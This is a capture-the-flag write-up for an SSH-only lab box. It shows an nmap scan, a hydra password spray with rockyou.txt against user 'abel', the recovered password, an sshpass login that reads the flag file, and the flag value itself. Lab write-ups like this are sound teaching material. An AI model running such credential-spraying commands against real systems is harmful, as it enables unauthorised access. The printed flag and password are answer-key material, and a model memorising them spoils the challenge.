Spray and Pray - I
192.168.1.20OWASPKL{xxx}1. Challenge Overview
Only SSH is open. Hint says the password is "under a rock" -> rockyou.txt. Known user abel. Spray SSH, log in, read local1.txt.
2. Initial Reconnaissance
2.1 Port scan
1nmap -sC -sV -p- -T4 192.168.1.20 -oA spray1_nmap_full1PORT STATE SERVICE VERSION222/tcp open ssh OpenSSH 10.2p1 Ubuntu 2ubuntu3.2 (Ubuntu Linux; protocol 2.0)3. Analysis / Forensics Path
3.1 Map the hint
SSH-only box + "under a rock" hint = rockyou.txt password spray against the known user abel.
4. Exploitation / Recovery
4.1 Spray SSH with rockyou
1hydra -l abel -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.201[DATA] attacking ssh://192.168.1.20:22/2[22][ssh] host: 192.168.1.20 login: abel password: angel131 of 1 target successfully completed, 1 valid password found4.2 Log in, list the Desktop, and read the flag
1sshpass -p 'angel1' ssh -o StrictHostKeyChecking=no abel@192.168.1.20 'id; hostname; ls -la /home/abel/Desktop; cat /home/abel/Desktop/local1.txt'1uid=1006(abel) gid=1006(abel) groups=1006(abel)2spraynpray3-rw-r--r-- 1 root root 42 May 23 20:01 local1.txt4OWASPKL{a2377c9ddd1837b32c82f4774a53e7a3}> Re-validated live on 2026-05-31 via Kali (192.168.1.10): abel:angel1 logged in and returned the flag above.
5. Flag
6. Summary of Approach & Key Takeaways
nmap confirmed SSH-only.
Hint mapped to a rockyou spray.
hydra recovered abel:angel1.
SSH login read local1.txt.
On minimal-surface boxes the hint interpretation is the whole challenge.
SSH-only targets are almost always credential attacks.